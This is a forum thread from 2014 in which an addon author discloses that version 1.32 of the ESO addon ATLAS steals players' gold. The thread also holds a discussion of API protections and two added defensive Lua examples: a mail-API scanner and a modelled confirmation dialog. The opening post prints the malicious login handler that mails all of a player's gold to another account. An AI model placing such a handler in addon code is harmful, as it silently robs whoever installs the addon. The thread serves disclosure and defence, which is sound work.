12/03/14, 09:48 PM   #1
Sasky
AddOn Author
Join Date: Apr 2014
Posts: 231
Malicious code in latest ATLAS (1.32)

@Cairenn or moderators -- tried PM first, delete this thread if needed once action taken.

Until one of the admins can remove the file (at least), disable ATLAS or make sure it does not update to version 1.32.

The latest version of ATLAS has the following malicious code in it:
Lua Code:
    function ATLAS:EVENT_PLAYER_ACTIVATED(...)
        d("|cFF2222ATLAS|r addon Loaded, /atlas for more info")
        RequestOpenMailbox()
        QueueMoneyAttachment(GetCurrentMoney())
        SendMail("<REDACTED>", "..")
        --
        -- Only once so unreg is from further events
        --
        EVENT_MANAGER:UnregisterForEvent( ATLAS.addonName, EVENT_PLAYER_ACTIVATED )
    end

For those who don't understand LUA, when the game loads in, it sends a mail with all gold in your bag to a specific player.

I've submitted a ticket and talked to a GM to report the account the gold was sent to.
12/03/14, 10:05 PM   #2
HyperToxic
AddOn Author
Join Date: Apr 2014
Posts: 1
I was robbed.

I updated this add-on before reading this and my gold is missing.
12/03/14, 10:14 PM   #3
Sasky
AddOn Author
Join Date: Apr 2014
Posts: 231
If you do lose your gold, disable the addon, then contact a GM using the in-game 'Ask for Help'. Someone responded fairly quickly and was able to restore the gold. I was asked to log off for 5 min or so to restore it, and when I logged back in it was there. The GM did indicate they were taking actions on their end -- whether banning or some form of bulk restore to everyone who sent mail to that person I don't know.
12/03/14, 10:46 PM   #4
Cairenn
Credendo Vides
 
Premium Member
WoWInterface Admin
Join Date: Mar 2004
Posts: 437
Yeah, I've already pulled it. Will be speaking with the 'author' shortly, just in the middle of something else right now.
12/03/14, 10:50 PM   #5
TribeofOne
Join Date: Mar 2014
Posts: 41
Thank you for the warning. Hope all those whom this affected get help.

Now that we know this can happen how do we protect ourselves?

Last edited by TribeofOne : 12/03/14 at 11:09 PM.
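One answer to "how do we protect ourselves?" is to look at what an addon calls before enabling it. The check below is an added example, not code from this thread or from any addon it mentions: it scans Lua source for the mail APIs quoted in the first post (RequestOpenMailbox, QueueMoneyAttachment, SendMail), notes which function each call sits in, and flags calls inside handlers that fire with no user action. QueueItemAttachment and EVENT_ADD_ON_LOADED are assumed names from the ESO API; the sample source is constructed in the shape of the quoted handler, with the recipient replaced by a placeholder.

```lua
-- Added example: a pre-install scan of addon Lua source for mail API calls.
-- Not from the thread or any addon on it; the ESO API is only referenced by
-- name (QueueItemAttachment and EVENT_ADD_ON_LOADED are assumed to exist).

-- API names to look for. The first three are quoted in the thread.
local MAIL_APIS = { "RequestOpenMailbox", "QueueMoneyAttachment",
                    "QueueItemAttachment", "SendMail" }

-- Handlers that run without any user action; a mail send here is the
-- pattern in the ATLAS 1.32 code, so it gets an extra flag.
local AUTO_EVENTS = { EVENT_PLAYER_ACTIVATED = true, EVENT_ADD_ON_LOADED = true }

-- Scan one chunk of Lua source. Returns a list of findings:
-- { line = n, api = name, func = enclosingFunctionName, automatic = bool }.
-- Function tracking is line-based and heuristic: a declaration line sets the
-- current function, an unindented "end" closes it.
local function scanSource(src)
    local findings, currentFunc, lineNo = {}, "<top level>", 0
    for line in (src .. "\n"):gmatch("(.-)\n") do
        lineNo = lineNo + 1
        local name = line:match("^%s*function%s+([%w_:%.]+)")
                  or line:match("^%s*local%s+function%s+([%w_]+)")
        if name then currentFunc = name end
        if line:match("^end%s*$") then currentFunc = "<top level>" end
        -- Skip comment-only lines so commented-out calls are not reported.
        if not line:match("^%s*%-%-") then
            for _, api in ipairs(MAIL_APIS) do
                if line:find(api .. "%s*%(") then
                    local auto = false
                    for ev in pairs(AUTO_EVENTS) do
                        if currentFunc:find(ev, 1, true) then auto = true end
                    end
                    findings[#findings + 1] =
                        { line = lineNo, api = api, func = currentFunc, automatic = auto }
                end
            end
        end
    end
    return findings
end

-- Convenience wrapper for a real addon file on disk.
local function scanFile(path)
    local f = assert(io.open(path, "r"))
    local src = f:read("*a")
    f:close()
    return scanSource(src)
end

-- Constructed sample in the shape of the quoted ATLAS handler, plus one
-- user-driven send for contrast. The recipient is a placeholder.
local SAMPLE = [[
function ATLAS:EVENT_PLAYER_ACTIVATED(...)
    d("ATLAS addon Loaded")
    RequestOpenMailbox()
    QueueMoneyAttachment(GetCurrentMoney())
    SendMail("@recipient-placeholder", "..")
    EVENT_MANAGER:UnregisterForEvent(ATLAS.addonName, EVENT_PLAYER_ACTIVATED)
end

function ATLAS:OnSendButtonClicked()
    -- user-driven: listed, but not flagged as automatic
    SendMail(self.recipient, self.subject)
end
]]

for _, f in ipairs(scanSource(SAMPLE)) do
    print(string.format("line %d: %s in %s%s", f.line, f.api, f.func,
        f.automatic and "  <-- fires without user action" or ""))
end
```

Run it over each .lua file in a downloaded addon with scanFile before copying the addon into the AddOns folder. A listed call is not proof of anything on its own, since mail addons legitimately use these functions; the combination of an attachment call and a send inside a load-time handler is what deserves a closer look.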
12/03/14, 10:53 PM   #6
TribeofOne
Join Date: Mar 2014
Posts: 41
Originally Posted by Cairenn View Post
Yeah, I've already pulled it. Will be speaking with the 'author' shortly, just in the middle of something else right now.

Cairenn, the "unredacted" code is showing up in several comments on the ATLAS page. You may want to mod those or lock it. I'd hate for someone else to take that code and add it to other addons and upload it.
12/04/14, 12:53 AM   #7
rkuhnjr
 
AddOn Author
Join Date: Nov 2014
Posts: 26
I'm surprised it's that easy to trigger a mail with all your gold via an addon; I mean, it's literally just three lines of code...


Thanks for the heads up.
12/04/14, 01:31 AM   #8
Ayantir
 
AddOn Author
Join Date: Jul 2014
Posts: 1,019
Very bad news, what was that guy thinking?

Ok, writing this kind of code needs ~1h starting from 0 in Lua,

But it also requires 2-3 ZOS GMs, your account definitely banned in less than 10 minutes, and now ZOS will have to think about "Should we disable the functionality of sending items and gold in addons?". ESOUI doesn't need this kind of people here. We're all volunteers, and spending time to prevent these things is really boring.

Okay, we have a problem with devs who leave and no one to take over their work, but seriously, I'm an addon dev; if I leave ESO tomorrow, I don't want someone like this being in charge of my work. We're few and it's not easy; a lot of us stop their work because maintaining an addon is a time gap for us.

I got 10 hours of work destroyed because one of my functions was also used by gold sellers, and if in the next release some functions go private, we'll know where it comes from.

It sucks.
12/04/14, 04:11 PM   #9
ZOS_ChipHilseberg
ZOS Staff!
Premium Member
Yes this person is from ZeniMax!
Join Date: Oct 2014
Posts: 551
Hey all. I wanted to let you know that this is on our radar on the code side and we've been discussing it internally. We of course believe in protecting players from malicious add-ons. However, it is also important to acknowledge that security often comes at the cost of restricted functionality. By making the mail attachment functions private we could prevent this behavior in the future. However, this would also prevent any sort of automated item or gold mailing add-on. In this particular case, it may be worth sacrificing the functionality for extra protection, but I first wanted to ask your opinions on the value of having accessible functions for managing mail attachments specifically. How useful are they to your existing or planned add-ons?
12/04/14, 04:23 PM   #10
Randactyl
AddOn Author
Join Date: Apr 2014
Posts: 251
I could concede access to a function that mails gold.

However, say I wanted to write something that would automatically send some items of type x to my group mate for immediate return who is dungeon farming with me (thus clearing some inventory space and allowing us to continue looking for Dwemer Scrap). I would like to retain access to an attachment function that only allows items to be attached without user input.

Or, just had this idea while replying, maybe change the attachment function to be a wrapper for a protected or private function that produces a confirmation dialog before any items/gold are attached to a mail? That way it shouldn't be able to be overwritten to remove the check.
12/04/14, 04:49 PM   #11
Garkin
 
AddOn Author
Join Date: Mar 2014
Posts: 832
All I want is a confirmation dialog when you're sending mail with an attachment.
It would be better if you can do that without making functions private. However as for me, I really do not mind if addons can't send attachments at all. Automated sending items just to clear bag space is convenient, but also sort of cheating.
12/04/14, 04:57 PM   #12
Randactyl
AddOn Author
Join Date: Apr 2014
Posts: 251
I can see the viewpoint that it is "cheating." My main point I guess was that I don't think a machete needs to be taken to the API again.

If this function needs to die, okay. But I would at least like all options to be explored first - in this case a confirmation dialog that cannot end up overwritten and skipped.
12/04/14, 06:22 PM   #13
TribeofOne
Join Date: Mar 2014
Posts: 41
I'm not a UI author, but I am a user of quite a few addons that at this point I wouldn't want to play without. I would rather have better inventory solutions, like maybe more space as in per-character and account bank space and a send-to-bank option from inventory.
As for this particular issue, a confirmation click that can't be automated would seem fair. It would help protect people but still allow legit use.
12/04/14, 07:45 PM   #14
Sasky
AddOn Author
Join Date: Apr 2014
Posts: 231
Best solution would be a confirmation on send instead of attach. It'd kick in whenever the mail being sent has gold attached. The dialog would also have to be protected from any addon access (so it can't be automated).

This could potentially be extended to items, but that's not as critical from two fronts: 1) it's more difficult to send high-value items than a bunch of gold and 2) people do use it for inventory management. I'm not sure the risk/impact warrants it, unless it's implemented as optional from the settings. In which case, each user would decide for themselves whether it's worth the risk.

If functions do need to be made private, the SendMail() function itself would be plenty to stop it. That way the addon could prepare the mail and let the user hit send, similar to how chat is blocked off. This would have the most impact on fully automated addons like Wykkyd's mail return and the GuildMail addons. Both of those are fairly well-used to save a lot of time, so it'd probably annoy a few people.
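Randactyl's idea of making the attachment function a wrapper around a protected function that raises a confirmation dialog, and Sasky's refinement of confirming on send with the dialog itself out of addon reach, modeled as an added example that is not ZOS code or any addon's code. The addon-facing table can compose, attach and request a send, but the only function that moves gold is a local closure reachable solely through dialog handlers that are never exported, so an addon has nothing to call or overwrite to skip the check; text-only mail passes straight through, as CrazyDutchGuy suggested. All names here (addonAPI, secureUI, transmit, the player state) are invented for the model; the real ESO API is not shaped like this, and the equivalent there would be ZOS marking the dialog's functions protected.

```lua
-- Added model of "confirmation on send, dialog out of addon reach".
-- Constructed throughout; not the ESO API and not any addon's code.

local addonAPI = {}   -- the surface an addon is handed
local secureUI  = {}  -- the confirmation dialog's handlers; never exported

-- Constructed player state.
local playerGold = 5000
local outbox = {}

-- The only code path that moves gold or items. It is a local, so nothing
-- that receives addonAPI can call it directly or replace it.
local function transmit(mail)
    if mail.gold > playerGold then
        return false, "insufficient gold"
    end
    playerGold = playerGold - mail.gold
    outbox[#outbox + 1] = mail
    return true
end

local pending = nil   -- the mail waiting for the user's decision, if any

function addonAPI.ComposeMail(to, subject, body)
    return { to = to, subject = subject, body = body, gold = 0, items = {} }
end

function addonAPI.QueueMoneyAttachment(mail, amount)
    mail.gold = amount
end

function addonAPI.QueueItemAttachment(mail, itemLink)
    mail.items[#mail.items + 1] = itemLink
end

function addonAPI.GetCurrentMoney() return playerGold end

-- Text-only mail goes straight through (mail-based logging keeps working);
-- anything with an attachment is parked and the dialog is raised.
function addonAPI.SendMail(mail)
    if mail.gold == 0 and #mail.items == 0 then
        return transmit(mail)
    end
    pending = mail
    secureUI.Show(mail)
    return false, "awaiting user confirmation"
end

-- Dialog side. A real Show() would render recipient, subject and every
-- attachment so the user sees exactly what leaves the account; the model
-- only records the prompt text.
function secureUI.Show(mail)
    secureUI.lastPrompt = string.format("Send %d gold and %d item(s) to %s?",
                                        mail.gold, #mail.items, mail.to)
end

function secureUI.OnConfirmClicked()
    if not pending then return false, "nothing pending" end
    local mail = pending
    pending = nil
    return transmit(mail)
end

function secureUI.OnDeclineClicked()
    pending = nil
end

-- Simulated addon with the same shape as the quoted ATLAS handler. It can
-- compose and attach, but SendMail moves nothing, and the table it holds has
-- no confirm handler to fake the click with.
local ATLAS = {}
function ATLAS:EVENT_PLAYER_ACTIVATED(api)
    local mail = api.ComposeMail("@recipient-placeholder", "..", "")
    api.QueueMoneyAttachment(mail, api.GetCurrentMoney())
    local ok, why = api.SendMail(mail)
    print("addon SendMail ->", ok, why, "| gold still held:", api.GetCurrentMoney())
    print("addon can reach confirm handler:", api.OnConfirmClicked ~= nil)
end
ATLAS:EVENT_PLAYER_ACTIVATED(addonAPI)

-- Only the user, through the dialog, completes or cancels the transfer.
print("dialog shows:", secureUI.lastPrompt)
secureUI.OnDeclineClicked()
print("after decline -> gold:", playerGold, "| mails sent:", #outbox)
```

The design choice worth noting is that the gate sits on send rather than on attach: an addon like a guild mailer can still prepare the whole message, and the user approves one dialog per mail that carries gold or items, while an addon that only sends text is unaffected. Whether that dialog can be made optional for item-only mail, as Sasky raises, is a policy question the model leaves open.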
12/05/14, 01:47 AM   #15
Anex
 
Join Date: Apr 2014
Posts: 4
I'm going to agree with the confirmation on attach. It seems the best and easiest way to please everyone and still be safe.
12/05/14, 04:03 AM   #16
BornDownUnder
AddOn Author
Join Date: Apr 2014
Posts: 59
Definitely a private function that is the backbone of any mail attachment; this would leave mass mailing addons such as mailR alone, allowing guild automation in sending out notifications, etc.

In saying that, I can foresee Wykkyd being quite unhappy with a dialogue box being thrown up on every mail that has an attachment; it would be good to see input from Wykkyd here.

On the note of mailing, could you please add a @name <Guild Association>... It would assist greatly in recognition of players from in-guild when dealing with mail.
12/05/14, 05:11 AM   #17
CrazyDutchGuy
 
AddOn Author
Join Date: Apr 2014
Posts: 89
Whether Wykkyd likes it or not is not the question. The functionality that he uses can also be used to send specific items or gold to a random person for someone's own gain.

A confirmation box with the full mail message/attachments is what you want, if you want to prevent this.

Note that I used the mail functionality in the past to send loot information to my account. If the mail is text only, then you can question whether it should be confirmed by a dialog box.
12/05/14, 05:37 AM   #18
Criscal
AddOn Author
Join Date: Apr 2014
Posts: 14
confirmation

Hi,

A confirmation dialogue is the solution I would like best. It would be even more fun if you could give each add-on certain permissions and in case of lack of permission put out an error notification window that tells you if the add-on tried something and which permission would be required.
12/05/14, 01:19 PM   #19
ZOS_ChipHilseberg
ZOS Staff!
Premium Member
Yes this person is from ZeniMax!
Join Date: Oct 2014
Posts: 551
Thank you all for the replies. We'll be looking into a secure confirmation for mails with attachments.
12/05/14, 02:01 PM   #20
Randactyl
AddOn Author
Join Date: Apr 2014
Posts: 251
Thanks for thinking of us!
